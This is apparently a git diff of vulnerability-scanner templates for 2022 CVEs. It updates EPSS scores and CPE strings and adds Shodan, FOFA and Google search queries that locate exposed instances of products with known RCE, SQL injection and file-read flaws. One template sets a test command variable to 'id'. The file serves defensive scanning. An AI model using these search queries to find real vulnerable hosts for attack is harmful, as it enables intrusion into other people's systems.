cpe:2.3:a:mingsoft:mcms:5.2.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24112.yaml b/http/cves/2022/CVE-2022-24112.yaml index d023a06b4a..e7512f0d03 100644 --- a/http/cves/2022/CVE-2022-24112.yaml +++ b/http/cves/2022/CVE-2022-24112.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-24112 cwe-id: CWE-290 - epss-score: 0.97261 - epss-percentile: 0.99825 + epss-score: 0.97411 + epss-percentile: 0.99928 cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -28,6 +28,7 @@ info: product: apisix shodan-query: title:"Apache APISIX Dashboard" fofa-query: title="Apache APISIX Dashboard" + google-query: intitle:"apache apisix dashboard" tags: cve,cve2022,apache,rce,apisix,oast,kev,intrusive http: diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml index 0a37dac7d6..c585c9bb99 100644 --- a/http/cves/2022/CVE-2022-24124.yaml +++ b/http/cves/2022/CVE-2022-24124.yaml @@ -20,14 +20,16 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24124 cwe-id: CWE-89 - epss-score: 0.07543 - epss-percentile: 0.93981 + epss-score: 0.08991 + epss-percentile: 0.94589 cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: casbin product: casdoor shodan-query: http.title:"Casdoor" + fofa-query: title="casdoor" + google-query: intitle:"casdoor" tags: cve,cve2022,sqli,unauth,packetstorm,edb,casdoor,casbin http: diff --git a/http/cves/2022/CVE-2022-2414.yaml b/http/cves/2022/CVE-2022-2414.yaml index 0f72b8b9b3..ae3e15df0c 100644 --- a/http/cves/2022/CVE-2022-2414.yaml +++ b/http/cves/2022/CVE-2022-2414.yaml @@ -29,6 +29,7 @@ info: product: dogtagpki shodan-query: title:"Identity Management" html:"FreeIPA" fofa-query: title="Identity Management" + google-query: intitle:"identity management" html:"freeipa" tags: cve,cve2022,dogtag,freeipa,xxe,dogtagpki http: diff --git a/http/cves/2022/CVE-2022-24181.yaml b/http/cves/2022/CVE-2022-24181.yaml index b3b7ce9f12..fca2d60c99 100644 --- a/http/cves/2022/CVE-2022-24181.yaml +++ b/http/cves/2022/CVE-2022-24181.yaml @@ -29,6 +29,7 @@ info: max-request: 1 vendor: public_knowledge_project product: open_journal_systems + shodan-query: cpe:"cpe:2.3:a:public_knowledge_project:open_journal_systems" tags: cve,cve2022,xss,oss,pkp-lib,edb,public_knowledge_project http: diff --git a/http/cves/2022/CVE-2022-24260.yaml b/http/cves/2022/CVE-2022-24260.yaml index b23a28e956..87f233070e 100644 --- a/http/cves/2022/CVE-2022-24260.yaml +++ b/http/cves/2022/CVE-2022-24260.yaml @@ -20,14 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2022-24260 cwe-id: CWE-89 - epss-score: 0.28138 - epss-percentile: 0.96726 + epss-score: 0.25256 + epss-percentile: 0.96681 cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: voipmonitor product: voipmonitor shodan-query: http.title:"VoIPmonitor" + fofa-query: title="voipmonitor" + google-query: intitle:"voipmonitor" tags: cve,cve2022,voipmonitor,sqli,unauth http: diff --git a/http/cves/2022/CVE-2022-24264.yaml b/http/cves/2022/CVE-2022-24264.yaml index 8b01b0a101..162c3e8803 100644 --- a/http/cves/2022/CVE-2022-24264.yaml +++ b/http/cves/2022/CVE-2022-24264.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24264 cwe-id: CWE-89 - epss-score: 0.04717 - epss-percentile: 0.91844 + epss-score: 0.11196 + epss-percentile: 0.95163 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24266.yaml b/http/cves/2022/CVE-2022-24266.yaml index c8fabc2f2b..8a6a582d0a 100644 --- a/http/cves/2022/CVE-2022-24266.yaml +++ b/http/cves/2022/CVE-2022-24266.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24266 cwe-id: CWE-89 - epss-score: 0.03412 - epss-percentile: 0.91229 + epss-score: 0.07762 + epss-percentile: 0.94189 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24288.yaml b/http/cves/2022/CVE-2022-24288.yaml index 8aa55a92ad..784c856b13 100644 --- a/http/cves/2022/CVE-2022-24288.yaml +++ b/http/cves/2022/CVE-2022-24288.yaml @@ -29,6 +29,8 @@ info: vendor: apache product: airflow shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" + fofa-query: title="sign in - airflow" + google-query: intitle:"sign in - airflow" tags: cve,cve2022,airflow,rce,apache http: diff --git a/http/cves/2022/CVE-2022-24384.yaml b/http/cves/2022/CVE-2022-24384.yaml index 735634f0ff..0c0b51b1dd 100644 --- a/http/cves/2022/CVE-2022-24384.yaml +++ b/http/cves/2022/CVE-2022-24384.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-24384 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.34937 + epss-percentile: 0.35729 cpe: cpe:2.3:a:smartertools:smartertrack:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: vendor: smartertools product: smartertrack shodan-query: http.favicon.hash:1410071322 + fofa-query: icon_hash=1410071322 tags: cve,cve2022,xss,smartertrack,smartertools http: diff --git a/http/cves/2022/CVE-2022-24627.yaml b/http/cves/2022/CVE-2022-24627.yaml index 251b1da63f..d3cb312564 100644 --- a/http/cves/2022/CVE-2022-24627.yaml +++ b/http/cves/2022/CVE-2022-24627.yaml @@ -24,8 +24,9 @@ info: vendor: audiocodes product: device_manager_express shodan-query: title:"Audiocodes" + fofa-query: title="audiocodes" + google-query: intitle:"audiocodes" tags: cve,cve2022,seclists,sqli,audiocodes - flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-24681.yaml b/http/cves/2022/CVE-2022-24681.yaml index 1cd1c7e9e0..0153e3b3d4 100644 --- a/http/cves/2022/CVE-2022-24681.yaml +++ b/http/cves/2022/CVE-2022-24681.yaml @@ -28,6 +28,9 @@ info: max-request: 1 vendor: zohocorp product: manageengine_adselfservice_plus + shodan-query: http.title:"manageengine" + fofa-query: title="manageengine" + google-query: intitle:"adselfservice plus" tags: cve,cve2022,manageengine,xss,authenticated,zohocorp http: diff --git a/http/cves/2022/CVE-2022-24716.yaml b/http/cves/2022/CVE-2022-24716.yaml index 8ced979300..e61feb47cc 100644 --- a/http/cves/2022/CVE-2022-24716.yaml +++ b/http/cves/2022/CVE-2022-24716.yaml @@ -28,6 +28,8 @@ info: vendor: icinga product: icinga_web_2 shodan-query: title:"Icinga" + fofa-query: title="icinga web 2 login" + google-query: intitle:"icinga" tags: cve,cve2022,packetstorm,icinga,lfi http: diff --git a/http/cves/2022/CVE-2022-24856.yaml b/http/cves/2022/CVE-2022-24856.yaml index 867ca9a9d9..a877ca379b 100644 --- a/http/cves/2022/CVE-2022-24856.yaml +++ b/http/cves/2022/CVE-2022-24856.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-24856 cwe-id: CWE-918 epss-score: 0.08397 - epss-percentile: 0.94255 + epss-percentile: 0.94394 cpe: cpe:2.3:a:flyte:flyte_console:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2486.yaml b/http/cves/2022/CVE-2022-2486.yaml index 3d4861baab..65623c2276 100644 --- a/http/cves/2022/CVE-2022-2486.yaml +++ b/http/cves/2022/CVE-2022-2486.yaml @@ -22,13 +22,13 @@ info: cve-id: CVE-2022-2486 cwe-id: CWE-78 epss-score: 0.97331 - epss-percentile: 0.99879 - cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.99885 + cpe: cpe:2.3:h:wavlink:wl-wn535k2:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: wavlink - product: wl-wn535k2_firmware + product: wl-wn535k2 shodan-query: http.title:"Wi-Fi APP Login" tags: cve2022,cve,iot,wavlink,router,rce,oast diff --git a/http/cves/2022/CVE-2022-2487.yaml b/http/cves/2022/CVE-2022-2487.yaml index 10b7510a7e..8dedab97e0 100644 --- a/http/cves/2022/CVE-2022-2487.yaml +++ b/http/cves/2022/CVE-2022-2487.yaml @@ -29,6 +29,8 @@ info: vendor: wavlink product: wl-wn535k2_firmware shodan-query: http.title:"Wi-Fi APP Login" + fofa-query: title="wi-fi app login" + google-query: intitle:"wi-fi app login" tags: cve,cve2022,iot,wavlink,router,rce,oast variables: cmd: "id" diff --git a/http/cves/2022/CVE-2022-2488.yaml b/http/cves/2022/CVE-2022-2488.yaml index 3f428bc088..e2316e3ad5 100644 --- a/http/cves/2022/CVE-2022-2488.yaml +++ b/http/cves/2022/CVE-2022-2488.yaml @@ -30,6 +30,8 @@ info: vendor: wavlink product: wl-wn535k2_firmware shodan-query: http.title:"Wi-Fi APP Login" + fofa-query: title="wi-fi app login" + google-query: intitle:"wi-fi app login" tags: cve,cve2022,iot,wavlink,router,rce,oast http: diff --git a/http/cves/2022/CVE-2022-24899.yaml b/http/cves/2022/CVE-2022-24899.yaml index ec78a7b42d..177e89d6c2 100644 --- a/http/cves/2022/CVE-2022-24899.yaml +++ b/http/cves/2022/CVE-2022-24899.yaml @@ -28,6 +28,8 @@ info: vendor: contao product: contao shodan-query: title:"Contao" + fofa-query: body="contao open source cms" + google-query: intitle:"contao" tags: cve,cve2022,contao,xss,huntr http: diff --git a/http/cves/2022/CVE-2022-24900.yaml b/http/cves/2022/CVE-2022-24900.yaml index 5197c4d2ea..1380d9c461 100644 --- a/http/cves/2022/CVE-2022-24900.yaml +++ b/http/cves/2022/CVE-2022-24900.yaml @@ -15,13 +15,14 @@ info: - https://vuldb.com/?id.198714 - https://nvd.nist.gov/vuln/detail/CVE-2022-24900 - https://github.com/onlaj/Piano-LED-Visualizer/commit/3f10602323cd8184e1c69a76b815655597bf0ee5 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2022-24900 cwe-id: CWE-668,CWE-22 epss-score: 0.00999 - epss-percentile: 0.81936 + epss-percentile: 0.83586 cpe: cpe:2.3:a:piano_led_visualizer_project:piano_led_visualizer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-25082.yaml b/http/cves/2022/CVE-2022-25082.yaml index 5c748465de..98e6deb6ea 100644 --- a/http/cves/2022/CVE-2022-25082.yaml +++ b/http/cves/2022/CVE-2022-25082.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-25082 cwe-id: CWE-78 epss-score: 0.0417 - epss-percentile: 0.92009 + epss-percentile: 0.92196 cpe: cpe:2.3:o:totolink:a950rg_firmware:4.1.2cu.5204_b20210112:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-25148.yaml b/http/cves/2022/CVE-2022-25148.yaml index c60b1f9c37..622ea8f31c 100644 --- a/http/cves/2022/CVE-2022-25148.yaml +++ b/http/cves/2022/CVE-2022-25148.yaml @@ -28,6 +28,9 @@ info: product: wp_statistics framework: wordpress google-query: inurl:/wp-content/plugins/wp-statistics + publicwww-query: /wp-content/plugins/wp-statistics/ + shodan-query: http.html:/wp-content/plugins/wp-statistics/ + fofa-query: body=/wp-content/plugins/wp-statistics/ tags: cve,cve2022,packetstorm,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs http: diff --git a/http/cves/2022/CVE-2022-25149.yaml b/http/cves/2022/CVE-2022-25149.yaml index 3ee911d449..a39264b6c3 100644 --- a/http/cves/2022/CVE-2022-25149.yaml +++ b/http/cves/2022/CVE-2022-25149.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-25149 cwe-id: CWE-89 - epss-score: 0.36793 - epss-percentile: 0.97067 + epss-score: 0.26955 + epss-percentile: 0.96764 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,9 @@ info: product: wp_statistics framework: wordpress publicwww-query: "/wp-content/plugins/wp-statistics/" + google-query: inurl:/wp-content/plugins/wp-statistics + shodan-query: http.html:/wp-content/plugins/wp-statistics/ + fofa-query: body=/wp-content/plugins/wp-statistics/ tags: cve2022,cve,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs http: diff --git a/http/cves/2022/CVE-2022-25216.yaml b/http/cves/2022/CVE-2022-25216.yaml index e76bdcc221..d7cb89b2fb 100644 --- a/http/cves/2022/CVE-2022-25216.yaml +++ b/http/cves/2022/CVE-2022-25216.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-25216 cwe-id: CWE-22 epss-score: 0.01345 - epss-percentile: 0.85828 + epss-percentile: 0.86086 cpe: cpe:2.3:a:dvdfab:12_player:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-25323.yaml b/http/cves/2022/CVE-2022-25323.yaml index ebf9e285b9..edb2633bde 100644 --- a/http/cves/2022/CVE-2022-25323.yaml +++ b/http/cves/2022/CVE-2022-25323.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2022-25323 cwe-id: CWE-79 epss-score: 0.00115 - epss-percentile: 0.45093 + epss-percentile: 0.45082 cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zerof product: web_server + shodan-query: cpe:"cpe:2.3:a:google:web_server" tags: cve,cve2022,xss,zerof http: diff --git a/http/cves/2022/CVE-2022-2535.yaml b/http/cves/2022/CVE-2022-2535.yaml index 1f9bd68c13..255b0eb855 100644 --- a/http/cves/2022/CVE-2022-2535.yaml +++ b/http/cves/2022/CVE-2022-2535.yaml @@ -26,6 +26,8 @@ info: product: searchwp_live_ajax_search framework: wordpress publicwww-query: "/wp-content/plugins/searchwp-live-ajax-search/" + shodan-query: http.html:/wp-content/plugins/searchwp-live-ajax-search/ + fofa-query: body=/wp-content/plugins/searchwp-live-ajax-search/ tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search,searchwp http: diff --git a/http/cves/2022/CVE-2022-25356.yaml b/http/cves/2022/CVE-2022-25356.yaml index 318df7ba5a..3bb3c6a4b9 100644 --- a/http/cves/2022/CVE-2022-25356.yaml +++ b/http/cves/2022/CVE-2022-25356.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-25356 cwe-id: CWE-91 epss-score: 0.00425 - epss-percentile: 0.73853 + epss-percentile: 0.74252 cpe: cpe:2.3:a:altn:securitygateway:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2546.yaml b/http/cves/2022/CVE-2022-2546.yaml index a8a68d14b5..1585e86903 100644 --- a/http/cves/2022/CVE-2022-2546.yaml +++ b/http/cves/2022/CVE-2022-2546.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-2546 cwe-id: CWE-79 epss-score: 0.00252 - epss-percentile: 0.64447 + epss-percentile: 0.6506 cpe: cpe:2.3:a:servmask:all-in-one_wp_migration:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25481.yaml b/http/cves/2022/CVE-2022-25481.yaml index 98eb3f6fa7..209f223789 100644 --- a/http/cves/2022/CVE-2022-25481.yaml +++ b/http/cves/2022/CVE-2022-25481.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-25481 cwe-id: CWE-668 epss-score: 0.01261 - epss-percentile: 0.85321 + epss-percentile: 0.85591 cpe: cpe:2.3:a:thinkphp:thinkphp:5.0.24:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: thinkphp product: thinkphp shodan-query: title:"ThinkPHP" + fofa-query: title="thinkphp" + google-query: intitle:"thinkphp" tags: cve,cve2022,thinkphp,exposure,oss http: diff --git a/http/cves/2022/CVE-2022-25487.yaml b/http/cves/2022/CVE-2022-25487.yaml index 5fe7a52c5e..49c1685267 100644 --- a/http/cves/2022/CVE-2022-25487.yaml +++ b/http/cves/2022/CVE-2022-25487.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-25487 cwe-id: CWE-434 - epss-score: 0.84615 - epss-percentile: 0.98422 + epss-score: 0.78706 + epss-percentile: 0.98263 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true @@ -29,7 +29,6 @@ info: vendor: thedigitalcraft product: atomcms tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft,fielupload - variables: string: "CVE-2022-25487" diff --git a/http/cves/2022/CVE-2022-25489.yaml b/http/cves/2022/CVE-2022-25489.yaml index 65ad5f3dce..ae416a1bbe 100644 --- a/http/cves/2022/CVE-2022-25489.yaml +++ b/http/cves/2022/CVE-2022-25489.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-25489 cwe-id: CWE-79 epss-score: 0.00134 - epss-percentile: 0.47681 + epss-percentile: 0.48559 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25497.yaml b/http/cves/2022/CVE-2022-25497.yaml index e52fbf3495..9873fbef5f 100644 --- a/http/cves/2022/CVE-2022-25497.yaml +++ b/http/cves/2022/CVE-2022-25497.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-25497 cwe-id: CWE-552 epss-score: 0.00508 - epss-percentile: 0.76089 + epss-percentile: 0.7649 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml index 5f74137a15..e0943c18f4 100644 --- a/http/cves/2022/CVE-2022-2551.yaml +++ b/http/cves/2022/CVE-2022-2551.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-2551 cwe-id: CWE-425 - epss-score: 0.72442 - epss-percentile: 0.97997 + epss-score: 0.66448 + epss-percentile: 0.97927 cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25568.yaml b/http/cves/2022/CVE-2022-25568.yaml index 69e144b774..e9d1ab7748 100644 --- a/http/cves/2022/CVE-2022-25568.yaml +++ b/http/cves/2022/CVE-2022-25568.yaml @@ -10,13 +10,15 @@ info: - https://www.pizzapower.me/2022/02/17/motioneye-config-info-disclosure/ - https://github.com/ccrisan/motioneye/issues/2292 - https://nvd.nist.gov/vuln/detail/cve-2022-25568 + - https://github.com/KayCHENvip/vulnerability-poc + - https://github.com/Miraitowa70/POC-Notes classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-25568 cwe-id: CWE-1188 - epss-score: 0.01838 - epss-percentile: 0.86962 + epss-score: 0.01501 + epss-percentile: 0.86918 cpe: cpe:2.3:a:motioneye_project:motioneye:*:*:*:*:*:*:*:* metadata: verified: true @@ -24,6 +26,7 @@ info: vendor: motioneye_project product: motioneye shodan-query: html:"MotionEye" + fofa-query: body="motioneye" tags: cve,cve2022,motioneye,config,motioneye_project http: diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index 9c2c7a2a42..4cd1769995 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-2599 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:anti-malware_security_and_brute-force_firewall_project:anti-malware_security_and_brute-force_firewall:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-26134.yaml b/http/cves/2022/CVE-2022-26134.yaml index f674d3e63d..0b720ebdf2 100644 --- a/http/cves/2022/CVE-2022-26134.yaml +++ b/http/cves/2022/CVE-2022-26134.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-26134 cwe-id: CWE-917 epss-score: 0.97528 - epss-percentile: 0.9999 + epss-percentile: 0.99992 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: atlassian product: confluence_data_center shodan-query: http.component:"Atlassian Confluence" + fofa-query: app="atlassian-confluence" tags: cve,cve2022,packetstorm,confluence,rce,ognl,oast,kev,atlassian http: diff --git a/http/cves/2022/CVE-2022-26138.yaml b/http/cves/2022/CVE-2022-26138.yaml index 10f5282faf..ef8f87f412 100644 --- a/http/cves/2022/CVE-2022-26138.yaml +++ b/http/cves/2022/CVE-2022-26138.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-26138 cwe-id: CWE-798 - epss-score: 0.97262 - epss-percentile: 0.99834 + epss-score: 0.97208 + epss-percentile: 0.99826 cpe: cpe:2.3:a:atlassian:questions_for_confluence:2.7.34:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26148.yaml b/http/cves/2022/CVE-2022-26148.yaml index da8a297eb5..e8e00bbee9 100644 --- a/http/cves/2022/CVE-2022-26148.yaml +++ b/http/cves/2022/CVE-2022-26148.yaml @@ -30,6 +30,7 @@ info: product: grafana shodan-query: title:"Grafana" fofa-query: app="Grafana" + google-query: intitle:"grafana" tags: cve,cve2022,grafana,zabbix,exposure http: diff --git a/http/cves/2022/CVE-2022-26233.yaml b/http/cves/2022/CVE-2022-26233.yaml index 5ac643025e..9f70167191 100644 --- a/http/cves/2022/CVE-2022-26233.yaml +++ b/http/cves/2022/CVE-2022-26233.yaml @@ -14,13 +14,14 @@ info: - http://seclists.org/fulldisclosure/2022/Apr/0 - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2022-26233 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-26233 cwe-id: CWE-22 - epss-score: 0.00654 - epss-percentile: 0.77223 + epss-score: 0.00628 + epss-percentile: 0.78973 cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml index 4bf2343e61..184bb6a231 100644 --- a/http/cves/2022/CVE-2022-2627.yaml +++ b/http/cves/2022/CVE-2022-2627.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-2627 cwe-id: CWE-79 - epss-score: 0.00119 - epss-percentile: 0.45193 + epss-score: 0.00106 + epss-percentile: 0.43227 cpe: cpe:2.3:a:tagdiv:newspaper:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: product: newspaper framework: wordpress publicwww-query: "/wp-content/themes/Newspaper" + shodan-query: http.html:/wp-content/themes/newspaper + fofa-query: body=/wp-content/themes/newspaper tags: cve2022,cve,xss,wordpress,wp,wp-theme,newspaper,wpscan,tagdiv http: diff --git a/http/cves/2022/CVE-2022-26352.yaml b/http/cves/2022/CVE-2022-26352.yaml index 9c61ad1df1..3020195c6b 100644 --- a/http/cves/2022/CVE-2022-26352.yaml +++ b/http/cves/2022/CVE-2022-26352.yaml @@ -20,13 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2022-26352 cwe-id: CWE-22 - epss-score: 0.97527 - epss-percentile: 0.99989 + epss-score: 0.97476 + epss-percentile: 0.99967 cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: dotcms product: dotcms + shodan-query: http.title:"dotcms" + fofa-query: title="dotcms" + google-query: intitle:"dotcms" tags: cve,cve2022,packetstorm,rce,dotcms,kev,fileupload,intrusive http: diff --git a/http/cves/2022/CVE-2022-26564.yaml b/http/cves/2022/CVE-2022-26564.yaml index 0dcca515bd..a5456732af 100644 --- a/http/cves/2022/CVE-2022-26564.yaml +++ b/http/cves/2022/CVE-2022-26564.yaml @@ -22,13 +22,15 @@ info: cve-id: CVE-2022-26564 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.39401 + epss-percentile: 0.40567 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.3:*:*:*:*:*:*:* metadata: max-request: 3 vendor: digitaldruid product: hoteldruid shodan-query: http.favicon.hash:-1521640213 + fofa-query: title="hoteldruid" + google-query: intitle:"hoteldruid" tags: cve,cve2022,hoteldruid,xss,digitaldruid http: diff --git a/http/cves/2022/CVE-2022-26833.yaml b/http/cves/2022/CVE-2022-26833.yaml index b20f2cee89..09b54bd0a5 100644 --- a/http/cves/2022/CVE-2022-26833.yaml +++ b/http/cves/2022/CVE-2022-26833.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-26833 cwe-id: CWE-306 epss-score: 0.0166 - epss-percentile: 0.87336 + epss-percentile: 0.8759 cpe: cpe:2.3:a:openautomationsoftware:oas_platform:16.00.0112:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26960.yaml b/http/cves/2022/CVE-2022-26960.yaml index e231a5d9bb..14498c83d0 100644 --- a/http/cves/2022/CVE-2022-26960.yaml +++ b/http/cves/2022/CVE-2022-26960.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.1 cve-id: CVE-2022-26960 cwe-id: CWE-22 - epss-score: 0.85922 - epss-percentile: 0.98481 + epss-score: 0.84507 + epss-percentile: 0.98501 cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2733.yaml b/http/cves/2022/CVE-2022-2733.yaml index a699662226..eb1dc1072b 100644 --- a/http/cves/2022/CVE-2022-2733.yaml +++ b/http/cves/2022/CVE-2022-2733.yaml @@ -28,6 +28,8 @@ info: vendor: open-emr product: openemr shodan-query: title:"OpenEMR" + fofa-query: icon_hash=1971268439 + google-query: intitle:"openemr" tags: cve,cve2022,xss,openemr,authenticated,huntr,open-emr http: diff --git a/http/cves/2022/CVE-2022-2756.yaml b/http/cves/2022/CVE-2022-2756.yaml index 7aa6b01048..56de6e769d 100644 --- a/http/cves/2022/CVE-2022-2756.yaml +++ b/http/cves/2022/CVE-2022-2756.yaml @@ -28,6 +28,8 @@ info: vendor: kavitareader product: kavita shodan-query: title:"kavita" + fofa-query: title="kavita" + google-query: intitle:"kavita" tags: cve,cve2022,ssrf,kavita,authenticated,huntr,intrusive,kavitareader http: diff --git a/http/cves/2022/CVE-2022-27593.yaml b/http/cves/2022/CVE-2022-27593.yaml index 7ac8e90f4b..0af9290eb8 100644 --- a/http/cves/2022/CVE-2022-27593.yaml +++ b/http/cves/2022/CVE-2022-27593.yaml @@ -30,6 +30,8 @@ info: vendor: qnap product: photo_station shodan-query: title:"QNAP" + fofa-query: title="photo station" + google-query: intitle:"qnap" tags: cve2022,cve,qnap,lfi,kev http: diff --git a/http/cves/2022/CVE-2022-27926.yaml b/http/cves/2022/CVE-2022-27926.yaml index 4009339caa..1ee4a12aa3 100644 --- a/http/cves/2022/CVE-2022-27926.yaml +++ b/http/cves/2022/CVE-2022-27926.yaml @@ -15,19 +15,22 @@ info: - https://wiki.zimbra.com/wiki/Security_Center - https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24 - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-27926 cwe-id: CWE-79 - epss-score: 0.91614 - epss-percentile: 0.98683 + epss-score: 0.96153 + epss-percentile: 0.99504 cpe: cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: zimbra product: collaboration + fofa-query: app="zimbra-邮件系统" + shodan-query: http.favicon.hash:"1624375939" tags: cve,cve2022,zimbra,xss,kev http: diff --git a/http/cves/2022/CVE-2022-28023.yaml b/http/cves/2022/CVE-2022-28023.yaml index c5e0cd719c..d37c37737c 100644 --- a/http/cves/2022/CVE-2022-28023.yaml +++ b/http/cves/2022/CVE-2022-28023.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-28023 cwe-id: CWE-89 - epss-score: 0.02266 - epss-percentile: 0.8936 + epss-score: 0.0161 + epss-percentile: 0.87425 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-28032.yaml b/http/cves/2022/CVE-2022-28032.yaml index dab4e32a34..9d865a26ec 100644 --- a/http/cves/2022/CVE-2022-28032.yaml +++ b/http/cves/2022/CVE-2022-28032.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-28032 cwe-id: CWE-89 - epss-score: 0.02266 - epss-percentile: 0.8936 + epss-score: 